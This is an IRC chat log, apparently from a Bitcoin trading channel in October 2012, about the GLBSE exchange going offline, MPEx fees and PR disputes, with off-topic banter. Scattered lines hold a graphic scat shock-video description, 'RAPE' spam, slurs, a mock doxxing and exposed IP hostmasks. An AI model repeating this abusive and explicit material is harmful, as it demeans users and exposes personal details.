exploits tend to end up blowing in your face Oct 04 21:34:04 how many tickets left Oct 04 21:34:08 10000 ? Oct 04 21:34:09 Over 2/3 sold Oct 04 21:34:10 take BTC-Mining as a fine example. he thinks he;'s been exploiting idiots Oct 04 21:34:23 except... if he gets nothing back off glbse now, is he actually a winner here ? or a net loser ? Oct 04 21:34:44 someone kick mircea Oct 04 21:34:45 I guess if nefario destroyed GLBSE, it makes shutting DMC down easier =/ Oct 04 21:34:52 trying to invest in the sense of "exploting idiots" never works aout, it's pretty much the same thing as trying to time a ponzi. Oct 04 21:34:52 dude Oct 04 21:34:54 stfu! Oct 04 21:34:58 stop saying shit like that Oct 04 21:35:00 rg whats your problem lol Oct 04 21:35:04 rg: 310 Oct 04 21:35:06 not you Oct 04 21:35:09 [14:34] I guess if nefario destroyed GLBSE, it makes shutting DMC down easier =/ Oct 04 21:35:18 theres no reason to think GLBSE is destroyed for any reason Oct 04 21:35:24 ^ Oct 04 21:35:35 yeah well, I have trouble giving a shit anymore Oct 04 21:35:42 nefario can go fuck himself Oct 04 21:36:04 umad bro Oct 04 21:36:05 ? Oct 04 21:36:18 Mad? Somewhat. Oct 04 21:36:24 you're subscribed to the dmc thread, right? Oct 04 21:36:40 i am proud to say i am not subscribed to ANY threads Oct 04 21:36:41 not even one Oct 04 21:37:02 !ticker s.dice Oct 04 21:37:03 [MPEX:S.DICE] 1day: 0 / 0 / 0 (0 shares, 0 BTC), 30day: 0.00325001 / 0.00337508 / 0.0034 (1794402 shares, 6,056.27 BTC) Oct 04 21:38:43 rg are you from like, 2011 ? Oct 04 21:39:20 mircea, what? How am I exploiting anyone? Oct 04 21:40:15 as in, buy cheap sell high. Oct 04 21:40:28 see luceo's quote for context. Oct 04 21:40:55 so... trading on the market is explotation now? =P Oct 04 21:41:24 BTC-Mining: Exploitation isn't always bad, if people are willing to price badly you may as well exploit that Oct 04 21:41:32 dude, he said he doesn't like mpex cause there's no idiots to exploit Oct 04 21:41:40 i pointed out that places built on idiots eventually collapse. Oct 04 21:41:58 I'm pretty sure I never used that term. Oct 04 21:41:58 leaving aside the fact that i never heard of a place with no idiots. Oct 04 21:42:03 [MPEX] [S.MPOE] 6221 @ 0.00036272 = 2.2565 BTC [-] Oct 04 21:42:16 "I am so sorry.. wtf.... glbse shut down.... i have been talking about this for days.. my life ssvings is gone,,," Oct 04 21:42:20 ^^ Oct 04 21:42:44 Look guys I am asorrt...l I am druni now.... its not my fault.. I will gibe you my work money. My wife wil kil me.. I mk sorry I am sorry.. I am sorry../// Oct 04 21:42:50 this is sad. Oct 04 21:43:07 mircea_popescu: No, I was sarcastically remarking that the fee tends to keep out the sunday traders Oct 04 21:43:27 are we going to go into a politically corect spiral nao ? Oct 04 21:43:34 I actually like mpex but the fee does keep out a lot of the smaller traders which can hurt liquidity in such a small market Oct 04 21:44:01 Luceo you oddly forget liquidity is what, 10x what glbse was at peak ? Oct 04 21:46:12 rg are you trolling or you really think there is no reason to think glbse is toast? Oct 04 21:46:45 Wow, just noticed Oct 04 21:47:00 And it was just yesterday I moved all my funds out Oct 04 21:47:07 Good timing for once Oct 04 21:47:13 wd. Oct 04 21:47:28 SlipFaunders what more did nefario have to say ? Oct 04 21:47:48 he said "uhh legal stuff" Oct 04 21:47:50 I have not talked to him since earlier. Oct 04 21:47:51 Have you? Oct 04 21:48:13 no, i was busy talking to urmom. Oct 04 21:48:28 say hi to Elvis while you're at it Oct 04 21:49:36 pigeons: serious as cancer Oct 04 21:49:48 like i said Oct 04 21:49:50 cancer is funnay. Oct 04 21:49:56 im thinking he tried to integrate some new shit Oct 04 21:50:01 Are DeaDTerra and I really the only ones that reached out to Nefario? Oct 04 21:50:01 to curb the bitching/moaning on IRC/forum Oct 04 21:50:08 and found terrible bugs Oct 04 21:50:23 too terrible to continue running Oct 04 21:50:25 so then it's toast. Oct 04 21:50:33 umm no Oct 04 21:50:34 seeing how it has terrible bugs, too terrible to continue Oct 04 21:50:35 well ? Oct 04 21:50:43 he has a new vesrion of the site Oct 04 21:50:46 and has had it Oct 04 21:50:51 right. why trust a. he found them all b. he can fix them ? Oct 04 21:50:52 the current site was obsoleted anyway Oct 04 21:51:03 no one finds ALL the bugs Oct 04 21:51:04 ever Oct 04 21:51:06 it doesnt happen Oct 04 21:51:11 his site is obsolete every 6 months Oct 04 21:51:21 ok HTML 1 boy Oct 04 21:51:23 make new one, fill it with scams, take his cut (refuse/delist those who don't give cut) Oct 04 21:51:30 then when they all blow, make "new version" Oct 04 21:51:33 of scam exchange Oct 04 21:51:38 more scams, more cuts, new version Oct 04 21:51:39 more scams, more cuts, new version Oct 04 21:51:40 etc. Oct 04 21:52:14 mircea_popescu: 9/11 Oct 04 21:52:21 hm ? Oct 04 21:52:22 the new version was to remove security and make it more accessible Oct 04 21:52:39 glbse has obviously been deeply affected by 9/11 Oct 04 21:52:47 lolk Oct 04 21:52:48 god damn terrorists Oct 04 21:53:10 When people go crazy, "9/11" Oct 04 21:53:23 Gets everyone together... to still be crazy? Oct 04 21:53:31 when peopel say shit you don't wanna hear... "9/11". Oct 04 21:53:35 works just as well. Oct 04 21:53:39 lol Oct 04 21:53:43 Works too. Oct 04 21:53:44 i just say 9/11 all the time Oct 04 21:53:44 irl Oct 04 21:53:50 'dude why did you do that james?' Oct 04 21:53:53 tourgette's ? Oct 04 21:53:53 '9/11 man... 9/11' Oct 04 21:54:23 never forget! Oct 04 21:54:39 or else the terrorists win Oct 04 21:54:46 thanks for the info post BTC-Mining Oct 04 21:55:46 people were so dumb about 9/11 Oct 04 21:55:54 I remember in Family Guy when Lois ran for mayor. Actual speeches left people there not impressed. She said 9/11. The crowd went crazy cheering. So her speech afterward were just repeating "9/11" over and over. Kept the crowd happy. Oct 04 21:55:55 a friend of mine still thinks 9/11 should be a national holiday Oct 04 21:56:03 hahaha btc-mining Oct 04 21:56:04 i reember that Oct 04 21:56:10 i cant believ ethat show is still on Oct 04 21:56:16 its not been good since it got canceled Oct 04 21:56:32 Eh, all shows turn bad. Oct 04 21:56:38 it was never good, they just tell 1000 jokes and everyone will laugh at a different 3 of them Oct 04 21:57:17 pigeons sure it was Oct 04 21:57:27 they pioneered that type of 'comedy' Oct 04 21:57:40 even the simpsons copied them for a while Oct 04 21:57:42 cause of ratings Oct 04 21:57:47 now the simpsons is back to just plain sucking Oct 04 21:57:50 and so is family guy Oct 04 21:57:52 No problem Ignatius. Just trying to keep what's known/claimed posted somewhere instead of people having to scour the forum. It's really a mess. Oct 04 21:58:04 copied by using 9/11 to get ratings up? Oct 04 21:58:28 [james@elephant The.Simpsons]$ ls Oct 04 21:58:28 MISC Season.07 Season.08 Season.11 Season.12 Season.13 Oct 04 21:58:32 only good simpsons Oct 04 21:58:45 BTC-Mining link ? Oct 04 21:58:46 season 9 is good too but ive seen iit 8000 times Oct 04 21:58:48 that's why i dont have it Oct 04 21:58:56 rg season 9 episode 11 is the best. Oct 04 21:58:59 HACKER Oct 04 21:59:04 WAREZ ADDICT Oct 04 21:59:08 my favorites are.. Oct 04 21:59:15 https://bitcointalk.org/index.php?topic=115467.0 Oct 04 21:59:15 i'm calling universal studios Oct 04 21:59:25 or who the fuck ever Oct 04 21:59:28 Mr X. , When they go to Japan Oct 04 21:59:42 eiei (annoyed grunt) Oct 04 21:59:48 that sthe tomacco episode Oct 04 22:00:01 i haven't seen the simpsons since family guy Oct 04 22:00:15 There's really not much to go on about. Oct 04 22:00:30 Grift Of The Magi, Bart To The Future, ake My Wife Sleaze Oct 04 22:00:36 hilarious eps Oct 04 22:01:06 I have only seen the first seasons actually... Oct 04 22:01:06 but what is the reward other than some vague social context to discuss an obscure cartoon show Oct 04 22:01:19 simpsons is not obscure Oct 04 22:01:20 Probably like 1 - 6 or 7 Oct 04 22:01:28 maybe in vietnam, where you're from Oct 04 22:01:36 i called it obscure and i meant it Oct 04 22:01:43 network television, fox? Oct 04 22:01:44 RAPE Oct 04 22:01:45 RAPE Oct 04 22:01:46 RAPE Oct 04 22:01:48 dying generation Oct 04 22:01:53 Fox is dying Oct 04 22:01:54 slowly Oct 04 22:02:02 fail people watch network tv Oct 04 22:02:10 i actually watch our local fox affiliates news program Oct 04 22:02:20 cause its bad Oct 04 22:02:27 and sometimes they have musical artists Oct 04 22:02:30 performing their art Oct 04 22:02:45 cartoon network should pick it up Oct 04 22:02:54 i wonder why they haven't Oct 04 22:02:58 you mean adult swim. Oct 04 22:02:59 i bet money Oct 04 22:03:02 DIFFERENT THINGS Oct 04 22:03:04 josh wang Oct 04 22:03:13 ha ha i just dropped jcpham's dox Oct 04 22:03:19 don't be joshing me Oct 04 22:04:05 anyways maybe i should watch the simpsons Oct 04 22:04:14 but it really needs to be syndicated more Oct 04 22:04:17 because its dead Oct 04 22:05:00 its usually on fox Oct 04 22:05:10 at either 6, 630, 7 or 730 Oct 04 22:05:19 im building the future of bitcoin lol Oct 04 22:05:32 is the lol part of the quote Oct 04 22:06:11 no, a nefario quote would have at least 17 'like's in it Oct 04 22:06:19 fuck ya'll Oct 04 22:06:20 haters Oct 04 22:06:21 oooooh burn Oct 04 22:06:24 dont use his shit if you dont like it Oct 04 22:06:41 we wont Oct 04 22:06:48 i would if i could Oct 04 22:06:50 as soon as we can extract our coins Oct 04 22:06:51 but its down Oct 04 22:07:12 [MPEX] [S.MPOE] 1100 @ 0.00036477 = 0.4012 BTC [+] Oct 04 22:07:14 [MPEX] [S.MPOE] 20500 @ 0.00036618 = 7.5067 BTC [+] Oct 04 22:07:14 [MPEX] [S.MPOE] 6200 @ 0.00036748 = 2.2784 BTC [+] Oct 04 22:07:29 oh a mad dash to crash the market will work Oct 04 22:07:29 rg actually... they can't use it even if they like it. Oct 04 22:07:37 me first me first Oct 04 22:07:49 mircea_popescu: you're just mad cause no matter how much glbse fucks up Oct 04 22:07:53 people *still* dont want to use mpex Oct 04 22:08:02 i can point and click Oct 04 22:08:03 right :D Oct 04 22:08:12 i need mpex to be point and click friendly Oct 04 22:08:18 well Oct 04 22:08:21 its like 3 words friendly Oct 04 22:08:23 jcpham, coinbr Oct 04 22:08:28 you can do anything on mpex with 1 command Oct 04 22:08:31 jcpham: is right Oct 04 22:08:31 and like 2+ argumnts Oct 04 22:08:37 I only have one hand free Oct 04 22:08:37 fuck commands Oct 04 22:08:41 point and click Oct 04 22:08:45 how am I supposed to gpg with one hand Oct 04 22:08:45 typing is faster than clicking Oct 04 22:09:23 ok so tablets are pointless Oct 04 22:09:27 what teh fuck Oct 04 22:09:31 let's take 25 years back in ui design Oct 04 22:09:34 I might have been raxxed Oct 04 22:09:40 or goxxed Oct 04 22:09:54 dub jcpham try jurov's thing, coinbr.com Oct 04 22:09:56 ok Oct 04 22:10:01 i dont like the bad karma in here Oct 04 22:10:04 its bumming out my high Oct 04 22:10:13 lets all figure out a movie that rg hasnt seen Oct 04 22:10:21 but wants to see Oct 04 22:10:26 Wall St.? Oct 04 22:10:26 swap.avi Oct 04 22:10:27 see that works Oct 04 22:10:32 UrMom Is Doing Detroit (volume 9) ? Oct 04 22:10:34 the brokerage can be point and click Oct 04 22:10:35 you know ive not yet seen wall st Oct 04 22:10:38 the new one Oct 04 22:10:44 SWAP.AVI Oct 04 22:10:49 that mightve been a good suggestion Oct 04 22:10:49 the new one was meh, ok. Oct 04 22:10:49 now we have a service economy based on an exchange Oct 04 22:10:55 jcpham :D Oct 04 22:10:55 if it was higher than a 5.5 on imdb Oct 04 22:10:56 ill watch it Oct 04 22:10:57 theres a new swap.avi? Oct 04 22:11:21 6.3 Oct 04 22:11:24 that's cuttin it pretty close Oct 04 22:11:25 anyways i'm just trolling Oct 04 22:11:35 i never bothered to read the instructions Oct 04 22:11:36 rg: ahh, yeah, it wasnt nearly as good as the original. :/ Oct 04 22:11:40 i wish i would have now though Oct 04 22:11:42 for mpex Oct 04 22:11:49 you should have jcpham Oct 04 22:11:49 why ? Oct 04 22:12:03 i regret being lazy Oct 04 22:12:13 cost you what, like 500 bux ? not the end of the world. Oct 04 22:12:13 i regret not diversify in your exchange Oct 04 22:12:34 it's really a matter of laziness Oct 04 22:12:41 20 30 btc whatever it is Oct 04 22:12:45 used to grow on trees Oct 04 22:12:49 yup Oct 04 22:12:50 now it doesn't Oct 04 22:12:56 well, it'll be 50 art some point so. Oct 04 22:13:19 mm Oct 04 22:13:22 coinbr looks pretty cool Oct 04 22:13:29 im glad someone finally fuckin did it Oct 04 22:13:32 swap.avi looks pretty cool too Oct 04 22:13:33 mircea_popescu: Some day that 50 BTC will be $50k :( Oct 04 22:13:42 Luceo that day the fee will prolly be 500 btc. Oct 04 22:13:55 the idea is sound really Oct 04 22:13:57 $500k to join an exchange? :P Oct 04 22:14:00 three chicks take turns eating each others dookie, vomiting it back out into their open assholes, then eating it again Oct 04 22:14:11 Luceo yes. Oct 04 22:14:20 name a place where it is free to trade securities Oct 04 22:14:24 Well... I'm sure a chair at any stock market is very costly... Oct 04 22:14:46 jcpham any place where securities = scams. Oct 04 22:15:02 you know what i meant Oct 04 22:15:09 yea i do. Oct 04 22:15:13 That's why most go through brokers conntected the system doing electronic transactions. Oct 04 22:15:13 an' yer rifght. Oct 04 22:15:24 it should cost money Oct 04 22:16:02 "I've reviewed your posts, you are definitely not worth doing business with , but carry on. Iggy button on." Oct 04 22:16:10 the only one thing i regret is that this btc being anon Oct 04 22:16:19 i can't fucking keep black lists properly. Oct 04 22:16:20 jcpham: cryptostocks :P Oct 04 22:16:52 is that the distributed thing Oct 04 22:16:57 sgornick's thing Oct 04 22:17:12 Its Vircurex's one Oct 04 22:17:46 jcpham: ? Oct 04 22:18:08 It's your PR person mircea. People hate it. It's a troll. Oct 04 22:18:11 i'm sorry i'm thinging of the bond thing Oct 04 22:18:24 let's talk about that since you are here Oct 04 22:19:19 BTC-Mining ya well, i'm really sorry I can't practically go "o, you're that cocky bullshitter talking back to my pr ? Fuck you, apologize, pay double or get lost". Oct 04 22:20:09 > jcpham: i'm sorry i'm thinging of the bond thing Oct 04 22:20:11 > let's talk about that since you are here Oct 04 22:20:13 bitcoin is too full of people with absurd ideas about themselves. Oct 04 22:20:26 jcpham: Is that directed to me? Oct 04 22:20:27 https://github.com/jgarzik/pybond#readme Oct 04 22:20:39 I think people are not fan of your bully like talk either Mircea =P Oct 04 22:20:46 Oh .. .ha .. that has happened like half a dozen times now. Oct 04 22:20:47 i think i am confused Oct 04 22:21:01 jgarzik != sgornick Oct 04 22:21:08 exactly Oct 04 22:21:10 BTC-Mining i can certainly see that. Oct 04 22:21:12 my apologies Oct 04 22:21:16 np Oct 04 22:21:31 sad fact of the matter is, things don't work w/o someone laying down the book ocasionally. Oct 04 22:21:56 You don't attract investors by giving a 360 degrees "FUCK YOU! TOLD YOU SO!" all around all the time. Oct 04 22:22:12 No matter if you're right or not. Oct 04 22:22:21 BTC-Mining experience seems to show i do. Oct 04 22:22:30 ever stopped to think about that ? Oct 04 22:22:47 "hey, this guy is doing everything wrong and comes up on top all the time... hmm.. maybe I AM WRONG ?!?!" Oct 04 22:23:17 I think it's more about people who can go over the talk and the fee because of the great issues on MPEx than anything else. Oct 04 22:23:38 Not because the PR helps. Oct 04 22:23:53 really, it's about the following fact : vapid idiots aren't investors. investors that are investors follow principles. Oct 04 22:24:16 but i wanna be an investor! Oct 04 22:24:17 you don't close a contract by offering people free bonbons unless you're selling cheap shoes for the mass market. Oct 04 22:24:29 quite a shit pile we have turned this into guys Oct 04 22:24:34 and by we i mean - not me Oct 04 22:24:40 ahahah line of the day Oct 04 22:24:42 some of the others, wow. Oct 04 22:27:53 I still believe you're hurting yourself. Attacking everything else without actually promoting yourself? Oct 04 22:28:22 Not very professional. That PR person should defend MPEx when attacked and give info and answers about it. Oct 04 22:28:43 Not attack others, if others are bad, real investors will come to the right place. Oct 04 22:28:48 BTC-Mining mpex owns a market. some idiots keep insisting in diluting that market with obvious scams. it's her job to point this out. Oct 04 22:28:51 no. Oct 04 22:28:57 scams need to be called out as scams. Oct 04 22:29:07 THEN real investors will figure things out. Oct 04 22:31:26 and otherwise, mpex has supported (incl with donations) all sorts of beneficial people and initiatives. Oct 04 22:31:47 If real investors needs to have the scams pointed out, then they're not really investors... Oct 04 22:31:48 it's just a matter of, the bad guys have a little cartel going and they're defending each other with empty words. Oct 04 22:31:59 we disagree on that. Oct 04 22:32:25 [MPEX] [S.MPOE] 15048 @ 0.00036366 = 5.4724 BTC [-] Oct 04 22:32:34 It seems so. Oct 04 22:33:55 well, not the end of the world. Oct 04 22:34:03 I support the bad guy cartel theory Oct 04 22:34:07 Indeed. Oct 04 22:36:14 think of intersango, nefario, theymos.. all in the same place, know each other irl, all shady as fuck like some gang of limey grifters Oct 04 22:36:22 is that where the fee to join mpex goes? Oct 04 22:36:30 to fighting the evil scammer cartels? Oct 04 22:36:56 boonies4u it goes back as dividends. Oct 04 22:37:17 oh? Oct 04 22:37:29 what did you think lol Oct 04 22:38:00 I didn't know how much of mpex was traded Oct 04 22:38:15 is it all on the market? Oct 04 22:38:55 mm, you know it's reported monthly, there's a thread in btctalk Oct 04 22:39:09 actually i don;t Oct 04 22:39:12 don't* Oct 04 22:39:16 link? Oct 04 22:40:26 https://bitcointalk.org/index.php?topic=64962.msg1230084#msg1230084 Oct 04 22:41:37 oh good luck with that Oct 04 22:44:44 you just think 30 btc would go to more than just bills and dividends Oct 04 22:45:13 you would* Oct 04 22:50:44 330 total last month actually Oct 04 22:50:47 course back then the fee was 20 Oct 04 22:51:49 like I said... good luck :P Oct 04 22:53:53 mortal kombat - prom edition http://i.imgur.com/rk5oq.gif Oct 04 22:56:29 that's not the prom Oct 04 22:57:32 [MPEX] [S.MPOE] 32952 @ 0.00036366 = 11.9833 BTC [-] Oct 04 22:57:34 [MPEX] [S.MPOE] 10648 @ 0.00036461 = 3.8824 BTC [+] Oct 04 22:58:08 thre goes mircea_popescu trading with himself again. except when he wears that black dress he actually thinks he's trading with someone else Oct 04 22:59:42 boonies4me Oct 04 23:01:18 I trade on MPEx, pretty sure all trades are legit. Oct 04 23:01:38 Even if I don't like MP or his PR person's ways personally. Oct 04 23:02:03 The exchange is fine as far as I'm concerned. Oct 04 23:05:26 mpoe-pr is a cunt Oct 04 23:05:35 4srs Oct 04 23:05:53 well that's barnum pr Oct 04 23:05:53 srs? Oct 04 23:08:09 Yes, I keep saying this MPOE-PR keeps giving a bad name to his fine exchange. Oct 04 23:15:28 rg: did you want something? Oct 04 23:19:16 no Oct 04 23:19:18 i was just saying hai Oct 04 23:22:57 [MPEX] [S.MPOE] 9500 @ 0.00036361 = 3.4543 BTC [-] Oct 04 23:48:18 [MPEX] [S.MPOE] 18800 @ 0.00036361 = 6.8359 BTC [-] Oct 05 00:12:23 so the elephant in the room.... GLBSE.... if it is required to shut down by the FSA, what happens to the shares of legitimate mining coop's? Oct 05 00:12:53 glbse moves Oct 05 00:12:56 are you an accredited investor? Oct 05 00:13:21 [MPEX] [F.GIGA.ETF] 1500 @ 0.00039785 = 0.5968 BTC [+] Oct 05 00:16:26 oh, one day away and all hell breaks loose... Oct 05 00:17:20 copumpkin: accredited? I had a few shares spread around, nothing huge though Oct 05 00:17:31 jurov: one day away from what? Oct 05 00:17:48 from irc and btctalk Oct 05 00:18:22 dakid: US issuers aren't supposed to be able to solicit investment from anyone but accredited investors, and accredited means you have a lot of money or make a lot of money :) Oct 05 00:18:33 so a lot of what you thought were legit shares might not be, if they were issued by people in the US Oct 05 00:18:37 and I think other countries have similar laws Oct 05 00:18:47 it's the reason most people can't invest in a hedge fund Oct 05 00:18:53 it's the law Oct 05 00:19:57 ah, actually i would probably qualify Oct 05 00:20:08 after reading the qualifications Oct 05 00:20:25 well, doesn't save the issuers :) Oct 05 00:20:57 if they're making public offerings, they need to follow regulations, and if not, they need to be talking only to accredited investors Oct 05 00:22:31 and I'm guessing that most bitcoiners don't qualify :) Oct 05 00:22:57 i never thought glbse was a 100% legal, i just assumed it was in the grey area of the law or was based out of a place without such regulations Oct 05 00:23:31 dakid: We'll see on Satuday. Oct 05 00:23:45 everyone I spoke with said it was grey area Oct 05 00:23:51 we'll see it seems:) Oct 05 00:23:57 when you invest neopoints on the neopets site do you need to be an accredited investor ? Oct 05 00:24:17 neopoints/neopets? Oct 05 00:24:23 ya neopets.com Oct 05 00:24:32 Perhaps we need to lauch our BTC securities on neopets.com Oct 05 00:24:44 yeah they have a stock market Oct 05 00:24:52 the neodaq or something like that :P Oct 05 00:25:16 GoonyGooGoo: hahaha, then they'll come after the evil bitcoiners for taking advantage of little kids Oct 05 00:26:05 i think most people don't consider btc a genuine currency if you read the popular press Oct 05 00:26:23 like loyalty points at a supermarket Oct 05 00:27:30 i wonder if anyones tried twittering/calling the FSA and asking about GLBSE Oct 05 00:28:19 i bet they wouldn't recognise it as a real entity Oct 05 00:28:27 easier for them that way Oct 05 00:34:10 nothing new here http://blog.glbse.com/ Oct 05 00:34:19 or here http://twitter.com/bitcoinglobal Oct 05 00:34:38 dakid Oct 05 00:34:41 i would not recommend that Oct 05 00:34:51 that's like calling the cops and asking them if they know about a crack house Oct 05 00:34:53 if they didn't Oct 05 00:34:55 they do now Oct 05 00:34:59 Is that Nefario? Oct 05 00:35:19 He looks like the type of guy that would hang out with mircea_popescu Oct 05 00:35:27 what's that supposed to mean Oct 05 00:35:31 you are making fun of two of my friends Oct 05 00:35:34 and you may die Oct 05 00:35:55 rg: the SEC/FSA already knows about that crack house Oct 05 00:36:15 dakid: can you do me a favor? Oct 05 00:36:23 I'm not sure where I said anything bad about them. Oct 05 00:36:55 perhaps Oct 05 00:36:58 WAKE ME UP, BEFORE YOU GO GO DONT LEAVE ME HANGIN ON LIKE A YO YO Oct 05 00:37:05 wake me UP Oct 05 00:37:07 before you go go Oct 05 00:37:09 and take me dancin tonight Oct 05 00:37:19 i wanna hit that hiiiiiiiiiiiiiiiiiiiiiiiiiiiighh yea yea yea Oct 05 00:37:26 you put the boom boom into my brain Oct 05 00:37:32 and i bang bang bang do whatever the same Oct 05 00:37:43 lol Oct 05 00:37:44 jitterbug into my brain Oct 05 00:38:56 [MPEX] [F.GIGA.ETF] 500 @ 0.00039785 = 0.1989 BTC [+] Oct 05 00:38:58 [MPEX] [F.GIGA.ETF] 2600 @ 0.00039785 = 1.0344 BTC [+] Oct 05 00:43:07 looks like all of you are screwed...but *I've* got claim codes Oct 05 00:46:04 now everyone can be goat Oct 05 00:46:28 http://www.youtube.com/watch?v=uU_bz-6giiU Oct 05 00:49:20 excuse me, i think some one sat on their drum machine :-P Oct 05 00:49:36 http://www.youtube.com/watch?v=cNrX5lCciMk Oct 05 00:50:02 i like PsychoticBoy's link tho Oct 05 00:50:10 :D Oct 05 00:50:38 and its gone :P Oct 05 00:50:45 I love dieselboy Oct 05 00:51:20 that track is win around the 2:00 mark "ladies and gentlemen its time for us to present to you something strong" Oct 05 00:51:42 this 'remix' is bull. Oct 05 00:52:47 PsychoticBoy: jesus man, that brings back some memories Oct 05 00:53:18 http://www.youtube.com/watch?v=Z3KGTbWxslw&feature=related Oct 05 00:53:26 this brings back mem Oct 05 00:53:58 http://arstechnica.com/tech-policy/2012/10/i-am-calling-you-from-windows-a-tech-support-scammer-dials-ars-technica/ Oct 05 00:54:02 i am calling you from windows Oct 05 00:56:44 lol Oct 05 00:56:52 we get those calls all the time Oct 05 00:57:03 I ask them to delete system 32 Oct 05 00:57:52 yeah that shit is OLD Oct 05 00:57:53 I have never gotten such a call...I will prepare a win virtual machine full of scat porn for the occasion Oct 05 00:57:56 if they worked on their script Oct 05 00:58:01 i bet they wouldve been way more successful Oct 05 01:04:04 [MPEX] [S.MPOE] 31442 @ 0.00036361 = 11.4326 BTC [-] Oct 05 01:09:55 no ops in #glbse, that's a bit ominous Oct 05 01:10:08 not really Oct 05 01:10:58 even given the website text? usually there is at least one op idling in that channel (at least there used to be) Oct 05 01:12:24 nefario is busy being waterboarded, he'll get back to you shortly Oct 05 01:12:49 lol Oct 05 01:15:59 lol Oct 05 01:16:12 I hate those orange jumpsuits Oct 05 01:19:20 this is why glbse is down www.youtube.com/watch?v=qgmgsLe0xrM Oct 05 01:22:00 Looks like it is necessary to assure everyone that the 30BTC fee for new MPEx accounts has no effect on coinbr users, current or future ones. Oct 05 01:23:06 TIL: "cockjuggling thundercunts" -- i'll just leave this here Oct 05 01:23:23 coinbr a broker? Oct 05 01:23:37 nvm Oct 05 01:29:06 [MPEX] [F.GIGA.ETF] 4100 @ 0.00039785 = 1.6312 BTC [+] Oct 05 01:29:08 [MPEX] [S.MPOE] 51400 @ 0.00036123 = 18.5672 BTC [-] Oct 05 01:31:40 ;;gpg eauth dentldir Oct 05 01:31:40 Request successful for user dentldir, hostmask dentldir!6b040ab7@gateway/web/freenode/ip.107.4.10.183. Get your encrypted OTP from http://bitcoin-otc.com/otps/0A32484F888E04D0 Oct 05 01:34:06 ;;gpg everify freenode:#bitcoin-otc:84819f22d43470d2f5dd03bd1b9fc0e8c6a30a89b4bdf1d8cca501f7 Oct 05 01:34:06 Error: In order to authenticate, you must be present in one of the following channels: #bitcoin-otc;#bitcoin-otc-foyer;#bitcoin-otc-ru;#bitcoin-otc-eu Oct 05 01:37:48 did the closedown of glbse have any significant impact on mpex trading volume (yet)? Oct 05 01:43:32 hi nefario Oct 05 01:45:34 ha! Oct 05 01:48:32 Who say's that's nefario? Oct 05 01:48:41 [18:42] --- farts_to_much [~james@94.197.127.235.threembb.co.uk] has joined #bitcoin-assets Oct 05 01:48:49 his gecos and ISP Oct 05 01:48:58 Not authed, not using nefario's registered nick Oct 05 01:49:08 Just coming from the same ISP as Nefario Oct 05 01:49:29 yeah, im sure its a coincidence Oct 05 01:50:21 Smoovious, last time i checked that was just one of many rumors being spread Oct 05 01:50:50 right Oct 05 01:51:08 you think if it was an update or move they could just say so Oct 05 01:51:08 i replace "closedown" with "downtime" in my question Oct 05 01:51:28 Not a coincidence. Just someone also in the UK trying to pass as nefario. Or he just forgot to obfuscate that before coming here to see how people were going. Oct 05 01:51:44 Smoovius: "We are updating" "We are moving servers" How hard is that to type? Oct 05 01:52:34 the fact hes not in contact with the other major shareholders isnt good. Oct 05 01:52:44 but it has implications. bitches love implications Oct 05 01:52:53 I assume he's in contact with some people Oct 05 01:53:01 well it means they are almost braindead when it comes to writing temporary placeholder text Oct 05 01:53:11 -NickServ(NickServ@services.)- Last seen : Oct 04 15:19:01 2012 (7 hours, 31 minutes, 57 seconds ago) Oct 05 01:53:11 hes probably ibn the tower of london lol Oct 05 01:53:20 which just doesn't match up with their ability to use a computer Oct 05 01:53:46 As far as I know, nefario already has a place to live. Oct 05 01:53:53 sure, but I don't think "they are massively incompetent" is much better reasoning than any other Oct 05 01:54:08 well we already know that Oct 05 01:54:14 just look at the website Oct 05 01:54:21 Smoovious, well... so did you presenting the "moving servers" theory as a fact :P Oct 05 01:54:22 [MPEX] [F.GIGA.ETF] 2500 @ 0.00039785 = 0.9946 BTC [+] Oct 05 01:55:17 then phrase it that way or add to the FUD Oct 05 01:56:25 ok. not gonna argue over that Oct 05 01:57:40 I dont think nefario is dishonest in any way. Just poor decision making. Oct 05 01:58:24 Like I told him once, I believe he is a great developer, but decision wise, he's not good at PR. Oct 05 01:58:45 I say the same about Mircea or Diablo-D3. Oct 05 01:58:50 glbse needs a board of directors and PR Oct 05 01:58:56 They can dev, but take PR decisions? Oct 05 01:58:59 Meh Oct 05 01:59:07 Nefario should stick to devloping :P Oct 05 01:59:45 seems to be the prob with most assets i've seen on the forum: lack of communication skills Oct 05 02:00:06 In the meanwhile... let's wait for Saturday. Oct 05 02:01:30 Lack of communication? I've seen tons of deposit takers dismissing legit questions as trolls and critics as trolls. Even completly valid points. If they were trolls, well they succeeded, you couldn't even counter-argue. Oct 05 02:02:14 lack of communicatiom *skills*. quantity != quality Oct 05 02:02:55 No, but it's important nonetheless Oct 05 02:03:11 agree Oct 05 02:03:46 Answer everything until people can only come up with statements so crazy it would make them look bad to bring them forward. You'd often realize "trolls" were actually more the paranoid type than trolls and eventually are satisfied. Oct 05 02:05:51 depends on your ressources. and quality of the trolls. if you find yourself answering questions all day instead of doing business, you've got a problem Oct 05 02:07:16 Aye, but the thing is, those who took the time to make everything clear and answer everything promptly pretty much don't have those "trolls" in their threads, oddly. Oct 05 02:08:43 might be, i don't think the amount of trolls in a thread is a good indicator, tho. especially with usagi it looks to me as if personal/emotional reason were involved Oct 05 02:11:07 I think it's mostly people invested in his funds and not happy about the fact usagi chose some investments which were losing investments. Oct 05 02:11:16 Probably. Oct 05 02:11:32 I never created a fund for that reason. Oct 05 02:12:53 You get 5%-10% of the 1-2% investments get weekly (For 1000 BTC, that's around $5-20 per week) Oct 05 02:13:19 Do you really have any incentive to be there most of the day to manage and quickly move positions? Oct 05 02:13:39 Most funds were lower than that, around 200-500 BTC tho. Oct 05 02:13:53 And a single big loss impacts everyone to top it. Oct 05 02:14:13 Managing a fund seems like the worst idea you could make. Oct 05 02:15:24 with btc under current conditions? definitely Oct 05 02:15:41 otherwise it sounds like a fun hobby if you have the time at your hands Oct 05 02:16:42 I took loans through GLBSE. Oct 05 02:16:42 how long does it take to get verified these days on mtgox? anyone know Oct 05 02:17:04 Paid far less in interests than any funds/securities. Oct 05 02:17:25 Much simpler Oct 05 02:18:34 Keep most profits for myself where I can make some. Oct 05 02:18:54 A loan contract is better. Oct 05 02:19:51 if you're looking for interests, then of course. dividends != interests. ppl often confuse them Oct 05 02:20:23 btcjam does most of the stuff glbse does lol Oct 05 02:20:24 [MPEX] [F.GIGA.ETF] 2000 @ 0.00039786 = 0.7957 BTC [+] Oct 05 02:20:25 [MPEX] [F.GIGA.ETF] 300 @ 0.00039786 = 0.1194 BTC [+] Oct 05 02:20:27 Yes, exactly. I was offering 0.5% in interests paid 